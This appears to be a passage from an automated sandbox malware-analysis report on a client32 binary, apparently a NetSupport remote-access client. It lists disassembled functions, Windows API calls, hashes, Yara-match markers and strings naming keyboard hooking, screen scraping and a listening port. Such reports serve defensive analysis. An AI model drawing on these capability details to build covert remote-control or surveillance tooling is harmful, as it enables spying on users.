                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                        • API String ID: 3874234733-2061581830
                                                        • Opcode ID: 11dbdab2167a41d006a5ed8c47bb96ee5bc3ae62b79fc54799e77c40f532fad6
                                                        • Instruction ID: a998bf938f72bd3d62f1ab24a8fee8fc38cc82ed36c591295b0484b214843149
                                                        • Opcode Fuzzy Hash: 11dbdab2167a41d006a5ed8c47bb96ee5bc3ae62b79fc54799e77c40f532fad6
                                                        • Instruction Fuzzy Hash: D8419275A00B54AFD7209F769C84AABFBF8FF95614B00492EE546D3A10E771EE00CB54
                                                        Function 111308E0 Relevance: 59.8, APIs: 15, Strings: 19, Instructions: 285libraryloaderregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2073 111308e0-11130924 call 111356e0 2076 111309b7-111309e1 call 111322d0 call 11135ee0 LoadLibraryA 2073->2076 2077 1113092a-1113094a call 11059580 2073->2077 2087 111309e3-111309e9 2076->2087 2088 11130a16-11130a1b 2076->2088 2077->2076 2082 1113094c-11130997 LoadLibraryA GetProcAddress 2077->2082 2085 11130999-1113099b 2082->2085 2086 1113099d-1113099f SetLastError 2082->2086 2089 111309a5-111309ae 2085->2089 2086->2089 2087->2088 2090 111309eb-111309f1 2087->2090 2091 11130a21-11130a41 GetClassInfoExA 2088->2091 2089->2076 2093 111309b0-111309b1 FreeLibrary 2089->2093 2090->2088 2094 111309f3-11130a14 call 11059580 2090->2094 2095 11130ae2-11130b35 2091->2095 2096 11130a47-11130a6e call 111507a0 call 11133900 2091->2096 2093->2076 2094->2091 2105 11130b71-11130b77 2095->2105 2106 11130b37-11130b3d 2095->2106 2107 11130a70-11130a84 call 11027fb0 2096->2107 2108 11130a87-11130ac9 call 11133900 call 11133930 LoadCursorA GetStockObject RegisterClassExA 2096->2108 2110 11130bb3-11130bd5 call 11059580 2105->2110 2111 11130b79-11130b88 call 11102870 2105->2111 2106->2105 2112 11130b3f-11130b45 2106->2112 2107->2108 2108->2095 2130 11130acb-11130adf call 11027fb0 2108->2130 2127 11130be3-11130be8 2110->2127 2128 11130bd7-11130be1 2110->2128 2125 11130b8a-11130baa 2111->2125 2126 11130bac 2111->2126 2112->2105 2117 11130b47-11130b5e call 1111e030 LoadLibraryA 2112->2117 2117->2105 2129 11130b60-11130b6c GetProcAddress 2117->2129 2131 11130bae 2125->2131 2126->2131 2132 11130bf4-11130bfa 2127->2132 2133 11130bea 2127->2133 2128->2132 2129->2105 2130->2095 2131->2110 2134 11130c07-11130c20 call 1112cb10 2132->2134 2135 11130bfc-11130c02 call 110ec9b0 2132->2135 2133->2132 2142 11130c26-11130c2c 2134->2142 2143 11130cbb-11130cc2 call 11125570 2134->2143 2135->2134 2144 11130c68-11130c6e 2142->2144 2145 11130c2e-11130c40 call 11102870 2142->2145 2154 11130cf6-11130d07 2143->2154 2155 11130cc4-11130cf3 call 111356e0 call 1113cea0 call 1113cb90 call 111356e0 2143->2155 2147 11130c70-11130c82 SetTimer 2144->2147 2148 11130c87-11130c93 2144->2148 2158 11130c42-11130c58 call 1114c180 2145->2158 2159 11130c5a 2145->2159 2147->2148 2151 11130c95-11130c9b 2148->2151 2152 11130caa-11130cb5 #17 LoadLibraryA 2148->2152 2151->2152 2156 11130c9d-11130ca3 2151->2156 2152->2143 2155->2154 2156->2152 2161 11130ca5 call 1111edf0 2156->2161 2160 11130c5c-11130c63 2158->2160 2159->2160 2160->2144 2161->2152
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(User32.dll,Client,DisableDPIAware,00000000,00000000,00000000,00000000), ref: 11130951
                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113098C
                                                        • SetLastError.KERNEL32(00000078), ref: 1113099F
                                                        • FreeLibrary.KERNEL32(00000000), ref: 111309B1
                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 111309D4
                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11130A39
                                                        • _memset.LIBCMT ref: 11130A4D
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 11130A9D
                                                        • GetStockObject.GDI32(00000000), ref: 11130AA7
                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11130B51
                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11130B66
                                                        • RegisterClassExA.USER32(?), ref: 11130ABE
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SetTimer.USER32(00000000,00000000,000003E8,1112CAF0), ref: 11130C7C
                                                        • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11130CAA
                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11130CB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                        • String ID: *quiet$Client$DisableDPIAware$HookKeyboard$InitUI (%d)$Inited VolumeControl.$Initing VolumeControl...$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                        • API String ID: 2794364348-1986316466
                                                        • Opcode ID: 515253d7f1545cb5aae5051ee3a7f6a71433c7a55e90cf05d6b349b9ad956a9d
                                                        • Instruction ID: aa8012bde1adae0a2c02f567617443f2e4728d78ef366c72babd61b7604c4b4a
                                                        • Opcode Fuzzy Hash: 515253d7f1545cb5aae5051ee3a7f6a71433c7a55e90cf05d6b349b9ad956a9d
                                                        • Instruction Fuzzy Hash: FAB1AFB8D12266EFDB00DFA5CDC8A9EFBB4BB8431DB10453DE91997248EB305900CB51
                                                        Function 110A1F30 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2172 110a1f30-110a1f92 LoadLibraryA GetProcAddress 2173 110a1f98-110a1fa9 SetupDiGetClassDevsA 2172->2173 2174 110a20a5-110a20ad SetLastError 2172->2174 2175 110a1faf-110a1fbd 2173->2175 2176 110a21b3-110a21b5 2173->2176 2177 110a20b9-110a20bb SetLastError 2174->2177 2178 110a1fc0-110a1fc4 2175->2178 2179 110a21be-110a21c0 2176->2179 2180 110a21b7-110a21b8 FreeLibrary 2176->2180 2181 110a20c1-110a20cc GetLastError 2177->2181 2183 110a1fdd-110a1ff5 2178->2183 2184 110a1fc6-110a1fd7 GetProcAddress 2178->2184 2182 110a21d7-110a21f2 call 11150781 2179->2182 2180->2179 2185 110a20d2-110a20dd call 11151665 2181->2185 2186 110a2160-110a2171 GetProcAddress 2181->2186 2183->2181 2195 110a1ffb-110a1ffd 2183->2195 2184->2177 2184->2183 2185->2178 2189 110a217b-110a217d SetLastError 2186->2189 2190 110a2173-110a2179 SetupDiDestroyDeviceInfoList 2186->2190 2194 110a2183-110a2185 2189->2194 2190->2194 2194->2176 2196 110a2187-110a21a9 CreateFileA 2194->2196 2197 110a2008-110a200a 2195->2197 2198 110a1fff-110a2005 call 11151665 2195->2198 2201 110a21ab-110a21b0 call 11151665 2196->2201 2202 110a21c2-110a21cc call 11151665 2196->2202 2199 110a200c-110a201f GetProcAddress 2197->2199 2200 110a2025-110a203b 2197->2200 2198->2197 2199->2200 2204 110a20e2-110a20ea SetLastError 2199->2204 2210 110a203d-110a2046 GetLastError 2200->2210 2212 110a204c-110a205f call 111515d1 2200->2212 2201->2176 2213 110a21ce-110a21cf FreeLibrary 2202->2213 2214 110a21d5 2202->2214 2204->2210 2210->2212 2215 110a2121-110a2132 call 110a1ed0 2210->2215 2222 110a2142-110a2153 call 110a1ed0 2212->2222 2223 110a2065-110a206d 2212->2223 2213->2214 2214->2182 2220 110a213b-110a213d 2215->2220 2221 110a2134-110a2135 FreeLibrary 2215->2221 2220->2182 2221->2220 2222->2220 2229 110a2155-110a215e FreeLibrary 2222->2229 2225 110a206f-110a2082 GetProcAddress 2223->2225 2226 110a2084-110a209b 2223->2226 2225->2226 2228 110a20ef-110a20f1 SetLastError 2225->2228 2230 110a20f7-110a2111 call 110a1ed0 call 11151665 2226->2230 2233 110a209d-110a20a0 2226->2233 2228->2230 2229->2182 2230->2220 2237 110a2113-110a211c FreeLibrary 2230->2237 2233->2178 2237->2182
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(setupapi.dll,82E0FB89,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11172BD8), ref: 110A1F63
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A1F87
                                                        • SetupDiGetClassDevsA.SETUPAPI(11194154,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF), ref: 110A1FA1
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A1FCC
                                                        • _free.LIBCMT ref: 110A2000
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A2012
                                                        • GetLastError.KERNEL32 ref: 110A203D
                                                        • _malloc.LIBCMT ref: 110A2053
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A2075
                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF,?,1102D836,Client), ref: 110A20A7
                                                        • SetLastError.KERNEL32(00000078), ref: 110A20BB
                                                        • GetLastError.KERNEL32 ref: 110A20C1
                                                        • _free.LIBCMT ref: 110A20D3
                                                        • SetLastError.KERNEL32(00000078), ref: 110A20E4
                                                        • SetLastError.KERNEL32(00000078), ref: 110A20F1
                                                        • _free.LIBCMT ref: 110A2104
                                                        • FreeLibrary.KERNEL32(?,?), ref: 110A2114
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF,?,1102D836,Client), ref: 110A21B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                        • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                        • API String ID: 3464732724-3340099623
                                                        • Opcode ID: 4cc9fdceffce41f4bb1e2a7a350048addaa331d0d16544aed3769fc1ff043338
                                                        • Instruction ID: dee8c5d27a7d1561559e6d59ec9b4eaefc10bb237f0b189c7ffb99ba61846665
                                                        • Opcode Fuzzy Hash: 4cc9fdceffce41f4bb1e2a7a350048addaa331d0d16544aed3769fc1ff043338
                                                        • Instruction Fuzzy Hash: 578196B5E40229AFD701DFE5ED84FDEBBB9AF55744F044134F912A6280DB74A501CB60
                                                        Function 111251E0 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2313 111251e0-1112521c 2314 11125222-11125244 call 11059580 2313->2314 2315 11125553-1112556e call 11150781 2313->2315 2314->2315 2320 1112524a-11125318 LoadLibraryA call 110098c0 LoadLibraryA GetCurrentProcess 2314->2320 2323 11125332-1112533c GetProcessHandleCount 2320->2323 2324 1112531a-11125330 GetProcAddress 2320->2324 2326 11125346-11125358 GetProcAddress 2323->2326 2324->2323 2325 1112533e-11125340 SetLastError 2324->2325 2325->2326 2327 11125371-11125394 SetLastError GetProcAddress 2326->2327 2328 1112535a-1112536f 2326->2328 2329 111253a3-111253ab SetLastError 2327->2329 2330 11125396-111253a1 2327->2330 2332 111253ae-111253be GetProcAddress 2328->2332 2329->2332 2330->2332 2334 111253c0-111253cc K32GetProcessMemoryInfo 2332->2334 2335 111253ce-111253d0 SetLastError 2332->2335 2337 111253d6-111253e4 2334->2337 2335->2337 2338 111253f2-111253fd 2337->2338 2339 111253e6-111253ee 2337->2339 2340 1112540b-11125416 2338->2340 2341 111253ff-11125407 2338->2341 2339->2338 2342 11125424-1112542e 2340->2342 2343 11125418-11125420 2340->2343 2341->2340 2344 11125430-11125437 2342->2344 2345 11125439-1112543c 2342->2345 2343->2342 2346 1112543e-1112544c call 111356e0 2344->2346 2345->2346 2347 1112544f-11125461 2345->2347 2346->2347 2351 11125467-11125479 call 1105f080 2347->2351 2352 11125529-11125537 2347->2352 2351->2352 2360 1112547f-111254a0 call 11059580 2351->2360 2353 11125539-1112553a FreeLibrary 2352->2353 2354 1112553c-11125544 2352->2354 2353->2354 2356 11125546-11125547 FreeLibrary 2354->2356 2357 11125549-1112554e 2354->2357 2356->2357 2357->2315 2359 11125550-11125551 FreeLibrary 2357->2359 2359->2315 2363 111254a2-111254a8 2360->2363 2364 111254ae-111254ca call 11059580 2360->2364 2363->2364 2365 111254aa 2363->2365 2368 111254d5-111254f1 call 11059580 2364->2368 2369 111254cc-111254cf 2364->2369 2365->2364 2373 111254f3-111254f6 2368->2373 2374 111254fc-11125518 call 11059580 2368->2374 2369->2368 2370 111254d1 2369->2370 2370->2368 2373->2374 2375 111254f8 2373->2375 2378 1112551a-1112551d 2374->2378 2379 1112551f-11125522 2374->2379 2375->2374 2378->2379 2380 11125524 call 110264a0 2378->2380 2379->2352 2379->2380 2380->2352
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • LoadLibraryA.KERNEL32(psapi.dll,_debug,CheckLeaks,00000001,00000000,82E0FB89), ref: 11125275
                                                          • Part of subcall function 110098C0: LoadLibraryA.KERNEL32(Kernel32.dll,771B0BD0,111252A0), ref: 110098C8
                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 111252A5
                                                        • GetCurrentProcess.KERNEL32 ref: 111252FE
                                                        • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11125326
                                                        • GetProcessHandleCount.KERNEL32(?,?), ref: 1112533A
                                                        • SetLastError.KERNEL32(00000078), ref: 11125340
                                                        • GetProcAddress.KERNEL32(00000000,GetGuiResources), ref: 1112534C
                                                        • SetLastError.KERNEL32(00000078), ref: 11125373
                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11125388
                                                        • SetLastError.KERNEL32(00000078), ref: 111253A5
                                                        • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111253B7
                                                        • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 111253CA
                                                        • SetLastError.KERNEL32(00000078), ref: 111253D0
                                                        • FreeLibrary.KERNEL32(?), ref: 1112553A
                                                        • FreeLibrary.KERNEL32(?), ref: 11125547
                                                        • FreeLibrary.KERNEL32(?), ref: 11125551
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressErrorLastProc$FreeLoadProcess$CountCurrentHandleInfoMemory__wcstoi64
                                                        • String ID: CheckLeaks$Client$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$User32.dll$_debug$psapi.dll
                                                        • API String ID: 4101391659-2960314602
                                                        • Opcode ID: 24f660dc49cf8063fb080170bf677cd14817b3fe85e91263a94df8b88c7d28d1
                                                        • Instruction ID: 9932062f5be36f07512d72675ff71bbfb044ef1448ff26fd2a4877b11468836e
                                                        • Opcode Fuzzy Hash: 24f660dc49cf8063fb080170bf677cd14817b3fe85e91263a94df8b88c7d28d1
                                                        • Instruction Fuzzy Hash: AAB125B0E05269AFDF50DFA9C8C4BDDFBB5BB48308F60446AE51AE7240EA705940CF51
                                                        Function 1102C369 Relevance: 45.8, APIs: 7, Strings: 19, Instructions: 303libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2382 1102c369 2383 1102c370-1102c381 2382->2383 2383->2383 2384 1102c383 2383->2384 2385 1102c4c4-1102c4dd call 11131f10 2384->2385 2388 1102c4e3-1102c4e5 2385->2388 2389 1102c360-1102c363 2385->2389 2392 1102c5e3-1102c5fd call 11135660 2388->2392 2393 1102c4eb-1102c4f1 2388->2393 2390 1102c365-1102c367 2389->2390 2391 1102c388-1102c391 2389->2391 2390->2383 2391->2385 2394 1102c397-1102c39e 2391->2394 2418 1102c653-1102c65f call 11029eb0 2392->2418 2419 1102c5ff-1102c618 call 11059580 2392->2419 2396 1102c4f3-1102c502 call 11134180 2393->2396 2397 1102c508-1102c518 2393->2397 2394->2385 2398 1102c493-1102c4a8 call 11151867 2394->2398 2399 1102c3a5-1102c3a7 2394->2399 2400 1102c4aa-1102c4bf call 11151867 2394->2400 2401 1102c43a-1102c46d call 11150341 call 11131740 2394->2401 2402 1102c47b-1102c491 call 111524f0 2394->2402 2403 1102c42b-1102c435 2394->2403 2404 1102c46f-1102c479 2394->2404 2405 1102c3ec-1102c3f2 2394->2405 2406 1102c41c-1102c426 2394->2406 2396->2397 2409 1102c51a 2397->2409 2410 1102c51f-1102c53d call 1102b5c0 2397->2410 2398->2385 2399->2385 2417 1102c3ad-1102c3e7 call 11150341 call 11131740 call 1102b5c0 2399->2417 2400->2385 2401->2385 2402->2385 2403->2385 2404->2385 2420 1102c3f4-1102c408 call 11151867 2405->2420 2421 1102c40d-1102c417 2405->2421 2406->2385 2409->2410 2410->2392 2433 1102c543-1102c568 call 110ae410 call 111356e0 2410->2433 2417->2385 2437 1102c661-1102c668 2418->2437 2438 1102c638-1102c63f 2418->2438 2419->2418 2441 1102c61a-1102c62c 2419->2441 2420->2385 2421->2385 2465 1102c573-1102c579 2433->2465 2466 1102c56a-1102c571 2433->2466 2443 1102c645-1102c648 2437->2443 2444 1102c66a-1102c674 2437->2444 2438->2443 2447 1102c815-1102c836 GetComputerNameA 2438->2447 2441->2418 2462 1102c62e 2441->2462 2448 1102c64a-1102c651 call 110ae410 2443->2448 2449 1102c679 2443->2449 2444->2447 2450 1102c838-1102c86c call 11026950 2447->2450 2451 1102c86e-1102c874 2447->2451 2457 1102c67c-1102c750 call 11026600 call 11026900 call 11026600 * 2 LoadLibraryA GetProcAddress 2448->2457 2449->2457 2450->2451 2484 1102c8c2-1102c8ce 2450->2484 2458 1102c876-1102c87b 2451->2458 2459 1102c8aa-1102c8bd call 111524f0 2451->2459 2518 1102c756-1102c76d 2457->2518 2519 1102c7e5-1102c7ed SetLastError 2457->2519 2468 1102c881-1102c885 2458->2468 2477 1102cab7-1102cada 2459->2477 2462->2438 2471 1102c57b-1102c582 call 11026a90 2465->2471 2472 1102c5d9 2465->2472 2466->2392 2474 1102c8a1-1102c8a3 2468->2474 2475 1102c887-1102c889 2468->2475 2471->2472 2491 1102c584-1102c5b6 2471->2491 2472->2392 2483 1102c8a6-1102c8a8 2474->2483 2481 1102c88b-1102c891 2475->2481 2482 1102c89d-1102c89f 2475->2482 2494 1102cb02-1102cb0a 2477->2494 2495 1102cadc-1102cae2 2477->2495 2481->2474 2487 1102c893-1102c89b 2481->2487 2482->2483 2483->2459 2483->2484 2489 1102c8d0-1102c8e5 call 110ae410 call 11028730 2484->2489 2490 1102c8e7-1102c8fa call 1107c3b0 2484->2490 2487->2468 2487->2482 2522 1102c943-1102c95c call 1107c3b0 2489->2522 2510 1102c921-1102c923 2490->2510 2511 1102c8fc-1102c91f 2490->2511 2505 1102c5c0-1102c5cf call 110eaeb0 2491->2505 2506 1102c5b8-1102c5be 2491->2506 2500 1102cb1c-1102cba8 call 11150341 * 2 call 111356e0 * 2 GetCurrentProcessId call 110e2d70 call 110269b0 call 111356e0 call 11150781 2494->2500 2501 1102cb0c-1102cb19 call 11131f00 call 11150341 2494->2501 2495->2494 2498 1102cae4-1102cafd call 1102bb50 2495->2498 2498->2494 2501->2500 2517 1102c5d2-1102c5d4 call 1102bb50 2505->2517 2506->2505 2506->2517 2521 1102c930-1102c941 2510->2521 2511->2522 2517->2472 2528 1102c7ae-1102c7ba 2518->2528 2538 1102c76f-1102c778 2518->2538 2519->2528 2521->2521 2521->2522 2543 1102c962-1102c9dd call 111356e0 call 110c4d10 call 110c6530 call 110ae410 wsprintfA call 110ae410 wsprintfA 2522->2543 2544 1102ca9c-1102caa9 call 111524f0 2522->2544 2532 1102c7bc-1102c7c8 2528->2532 2533 1102c7fd-1102c80c 2528->2533 2539 1102c7da-1102c7de 2532->2539 2540 1102c7ca-1102c7d8 GetProcAddress 2532->2540 2533->2447 2541 1102c80e-1102c80f FreeLibrary 2533->2541 2538->2528 2542 1102c77a-1102c792 call 1111cad0 2538->2542 2546 1102c7e0-1102c7e3 2539->2546 2547 1102c7ef-1102c7f1 SetLastError 2539->2547 2540->2539 2541->2447 2542->2528 2561 1102c794-1102c7a9 call 11026640 2542->2561 2578 1102c9f3-1102ca09 call 1111a8e0 2543->2578 2579 1102c9df-1102c9ee call 11027fb0 2543->2579 2560 1102caac-1102cab1 CharUpperA 2544->2560 2552 1102c7f7 2546->2552 2547->2552 2552->2533 2560->2477 2561->2528 2583 1102ca22-1102ca5c call 110c5c80 * 2 2578->2583 2584 1102ca0b-1102ca1d call 110c5c80 2578->2584 2579->2578 2591 1102ca72-1102ca9a call 111524f0 call 110c5870 2583->2591 2592 1102ca5e-1102ca6d call 11027fb0 2583->2592 2584->2583 2591->2560 2592->2591
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102C6D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: $18/03/14 09:15:42 V12.01F3$494126$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape
                                                        • API String ID: 1029625771-1354138522
                                                        • Opcode ID: bf17c5d3710b8a98e8f839d43164a9bb9925bd54a7e7670717860283893199c7
                                                        • Instruction ID: ca0982745070245b62b0d9423a17b587d5718592cb53d7dfc1a06a055831e232
                                                        • Opcode Fuzzy Hash: bf17c5d3710b8a98e8f839d43164a9bb9925bd54a7e7670717860283893199c7
                                                        • Instruction Fuzzy Hash: 09B1A475E002659FDB22DF948D84BEDF7B9BB45318F8481E9E90CA7244DB706A808F61
                                                        Function 11027150 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
